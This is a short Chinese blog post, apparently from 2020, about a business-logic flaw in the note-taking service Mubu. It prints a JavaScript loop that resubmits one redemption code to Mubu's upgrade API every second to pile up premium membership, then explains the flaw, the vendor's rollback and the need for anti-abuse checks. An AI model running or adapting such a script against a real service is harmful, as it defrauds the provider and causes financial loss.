1条留言 [软件开发] 季雨林 2020/7/20 8:33:57
前两天,有朋友给了个脚本,说是可以幕布高级会员无限续费。遂尝试了一下,果然,js脚本循环的去提交一个注册码,每次执行的结果是增加一个月VIP会员,把脚本扔在那里,不一会就刷到了好多年之后。代码脚本如下:
function mubu() {
let formdata = new FormData();
formdata.append('code', "9642-9716-0768-8881") fetch("https://mubu.com/api/upgrade/use_code", {
method: "POST",
body: formdata
}).then((res) = >{
console.log('续费成功')
},
err = >{
console.log(err)
}).
catch(err = >{
console.log(err)
})
}
setInterval(mubu, 1000)
代码解释:很显然,这是一个程序设计缺点,用完的优惠码没有立刻失效,同时又遇上了利用程序脚本进行薅羊毛的情况。
造成损失很明显:用户利用这段脚本可以无限制的刷活动量,从而一个月加一个月的无限制叠加,获得近乎“永久”的高级会员权利。
处理后果也很明显:官方在具备某些数据可追溯的情况下,进行了数据回滚,从而取消了这种由于利用程序漏洞的行为。
现如今,涉及到权益兑换的程序逻辑越来越多 ,防止薅羊毛的需求越来越高,因为涉及到权益,因此稍微不慎,可能造成的就是经济损失
原文地址:
https://www.opengps.cn/Blog/View.aspx?id=732
文章的更新编辑依此链接为准。欢迎关注源站原创文章!